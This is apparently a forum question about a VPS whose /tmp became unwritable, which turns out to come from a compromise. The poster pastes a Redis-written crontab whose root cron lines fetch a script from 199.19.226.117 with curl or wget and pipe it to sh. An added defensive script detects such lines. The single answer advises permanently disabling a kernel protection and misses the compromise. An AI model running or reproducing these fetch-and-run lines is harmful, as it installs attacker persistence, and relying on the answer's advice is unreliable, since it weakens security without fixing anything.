I am unable to write to the /tmp directory.
Doing this as a non-root user:
europasprak@vps-xxxxxxxx:~$ echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted
and
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' | sudo tee /tmp/dummy
tee: /tmp/dummy: Operation not permitted
and as the root user:
root@vps-xxxxxxxx:~# echo 'ok' > /tmp/dummy
bash: /tmp/dummy: Operation not permitted
It refuses even before asking for the sudo password:
Last login: Wed Aug 18 19:38:33 2021 from 91.168.98.130
europasprak@vps-3506b083:~$ sudo echo 'ok' > /tmp/dummy2
-bash: /tmp/dummy2: Operation not permitted
Interestingly, as root it refuses to set the times in the following command:
root@vps-xxxxxxxx:/home/europasprak# touch /tmp/ok
touch: setting times of '/tmp/ok': No such file or directory
The problem appeared this morning.
The machine is:
europasprak@vps-xxxxxxxx:~$ uname -a
Linux vps-xxxxxxxx 5.8.0-63-generic #71-Ubuntu SMP Tue Jul 13 15:59:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Partitions:
europasprak@vps-xxxxxxxx:~$ df
Filesystem 1K-blocks Used Available Use% Mounted on
tmpfs 795424 1072 794352 1% /run
/dev/sda1 162420480 59362024 103042072 37% /
tmpfs 3977116 0 3977116 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 4096 0 4096 0% /sys/fs/cgroup
/dev/sda15 106858 8008 98851 8% /boot/efi
overlay 162420480 59362024 103042072 37% /home/europasprak/programs/install/docker/overlay2/2f1f82255bbd13b61ea151363e46880c4902b4b822fca15078fb9a10461111df/merged
europasprak@vps-xxxxxxxx:~$ df -i
Filesystem Inodes IUsed IFree IUse% Mounted on
tmpfs 994279 640 993639 1% /run
/dev/sda1 20643840 523620 20120220 3% /
tmpfs 994279 4 994275 1% /dev/shm
tmpfs 994279 3 994276 1% /run/lock
tmpfs 1024 18 1006 2% /sys/fs/cgroup
/dev/sda15 0 0 0 - /boot/efi
More output:
europasprak@vps-xxxxxxxx:~$ ls -ld /tmp
drwxrwxrwt 12 root root 4096 août 18 05:45 /tmp
europasprak@vps-xxxxxxxx:~$ lsattr /tmp
--------------e----- /tmp/dump.rdb
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-timesyncd.service-11J2sh
lsattr: Permission denied While reading flags on /tmp/tmp.40xGrsPHCk
--------------e----- /tmp/exp_lin.so
--------------e----- /tmp/oi_plugins.php
--------------e----- /tmp/backup.db
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-logind.service-ffm01g
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-resolved.service-E7ECGg
--------------e----- /tmp/xm4.tgz
lsattr: Permission denied While reading flags on /tmp/snap.lxd
Update: I tried to install acl, but it obviously failed:
europasprak@vps-xxxxxxxx:~$ sudo apt install acl
Reading package lists... Error!
E: Unable to mkstemp /tmp/clearsigned.message.VjQNL9 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.
europasprak@vps-xxxxxxxx:~$ sudo apt update
Err:1 http://security.ubuntu.com/ubuntu groovy-security InRelease
Temporary failure resolving 'security.ubuntu.com'
Err:2 https://download.docker.com/linux/ubuntu groovy InRelease
Temporary failure resolving 'download.docker.com'
Err:3 http://ppa.launchpad.net/ultradvorka/ppa/ubuntu groovy InRelease
Temporary failure resolving 'ppa.launchpad.net'
Err:4 http://nova.clouds.archive.ubuntu.com/ubuntu groovy InRelease
Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:5 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-updates InRelease
Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:6 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-backports InRelease
Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Reading package lists... Error!
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy/InRelease Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-updates/InRelease Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-backports/InRelease Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://security.ubuntu.com/ubuntu/dists/groovy-security/InRelease Temporary failure resolving 'security.ubuntu.com'
W: Failed to fetch https://download.docker.com/linux/ubuntu/dists/groovy/InRelease Temporary failure resolving 'download.docker.com'
W: Failed to fetch http://ppa.launchpad.net/ultradvorka/ppa/ubuntu/dists/groovy/InRelease Temporary failure resolving 'ppa.launchpad.net'
W: Some index files failed to download. They have been ignored, or old ones used instead.
E: Unable to mkstemp /tmp/clearsigned.message.cOHaS4 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.
Update: I also tried turning off a setting, but it did not help:
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted
europasprak@vps-xxxxxxxx:~$ sudo sysctl fs.protected_regular=0
[sudo] password for europasprak:
fs.protected_regular = 0
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted
The VPS is a KVM instance:
europasprak@vps-xxxxxxxx:~$ sudo virt-what
kvm
Update:
europasprak@vps-xxxxxxxx:~$ sudo journalctl --boot --priority=4
[sudo] password for europasprak:
-- Logs begin at Thu 2021-04-01 18:46:32 UTC, end at Sun 2021-08-22 13:54:48 UTC. --
août 20 20:52:46 vps-3506b083 kernel: #2
août 20 20:52:46 vps-3506b083 kernel: #3
août 20 20:52:46 vps-3506b083 kernel: acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge.
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: EISA: Cannot allocate resource for mainboard
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 1
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 2
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 3
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 4
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 5
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 6
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 7
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 8
août 20 20:52:46 vps-3506b083 kernel: sd 2:0:0:0: Power-on or device reset occurred
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/plymouth-start.service:17: Unit configured to use KillMode=none. This is unsafe, as it disables>
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/dbus.service:12: Unit configured to use KillMode=none. This is unsafe, as it disables systemd's>
août 20 20:52:46 vps-3506b083 systemd-udevd[413]: Could not set WakeOnLan of ens3 to off: Operation not supported
août 20 20:52:48 vps-3506b083 systemd-networkd[658]: /run/systemd/network/10-netplan-ens3.network: MTUBytes= in [Link] section and UseMTU= in [DHCP] section >
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/crontab
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/zzh
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/dog
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: testvxlan: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vx-001000-z6tjy: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[413]: vethe97279b: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vethe514997: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-networkd[658]: vethe97279b: Failed to wait for the interface to be initialized: No such device
europasprak@vps-3506b083:~$
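Update: I found that my /etc/crontab file has been tampered with. My system has been hacked. Strangely, there does not seem to be any mining activity. I think I need to completely reinstall the system.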
REDIS0006þ^@^@^Gbackup3Ã@Q@X^G
*/4 * ^A^_root curl -fsSL http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh
^@^Gbackup1@F
*/2 * * * * root cd1 -fsSL http://199.19.226.117/b2f628/b.sh | sh
^@^Gbackup4Ã@Q@X^G
*/5 * ^A^_root wd1 -q -O- http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh
^@^Gbackup2@H
*/3 * * * * root wget -q -O- http://199.19.226.117/b2f628/b.sh | sh
ÿWìðr<90><93>^Gæ
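The tampered /etc/crontab above starts with the `REDIS` magic of an RDB snapshot and carries cron entries that pipe a fetched URL into `sh`. The following triage script is an added example, not part of the original post; the function names `scan_cron_file` and `scan_all` and the finding labels are hypothetical.

```shell
#!/bin/sh
# Added example: triage cron files for signs of a Redis-written crontab.
# Usage: sh scan.sh /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*

# Prints one finding name per line for file $1; prints nothing if clean.
scan_cron_file() {
    f=$1
    [ -r "$f" ] || { echo "unreadable"; return 0; }
    # An RDB snapshot begins with the ASCII magic "REDIS" and a version.
    if head -c 5 "$f" | LC_ALL=C grep -aq '^REDIS'; then
        echo "rdb-header"
    fi
    # Match the URL-to-shell pipe, not the tool name: the entries on this
    # page put curl, wget, cd1 and wd1 in front of the same pipe.
    # -a makes grep search text lines embedded in binary data.
    if LC_ALL=C grep -aEq 'https?://[^|]*\|[[:space:]]*(ba)?sh' "$f"; then
        echo "url-piped-to-shell"
    fi
    # Control bytes other than tab, LF and CR do not belong in a crontab.
    n=$(LC_ALL=C tr -cd '\000-\010\013\014\016-\037' < "$f" | wc -c | tr -d ' ')
    if [ "$n" -gt 0 ]; then
        echo "control-bytes:$n"
    fi
    return 0
}

# Scan each regular file given; files with no findings are reported as clean.
scan_all() {
    for p in "$@"; do
        [ -f "$p" ] || continue
        r=$(scan_cron_file "$p" | tr '\n' ' ')
        echo "$p: ${r:-clean}"
    done
}

if [ "$#" -gt 0 ]; then
    scan_all "$@"
fi
```

The journal output above also names /etc/cron.d/zzh and /etc/cron.d/dog as unparsable, so those paths belong in the argument list alongside /etc/crontab.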
Answer 1
This is standard behavior in Ubuntu 20.04+ because of the fs.protected_regular Linux kernel parameter. You can try disabling it like this:
sudo sysctl fs.protected_regular=0
and see whether you can write to /tmp now.
If you want to make the fs.protected_regular=0 change permanent, add it to the /usr/lib/sysctl.d/protect-links.conf file.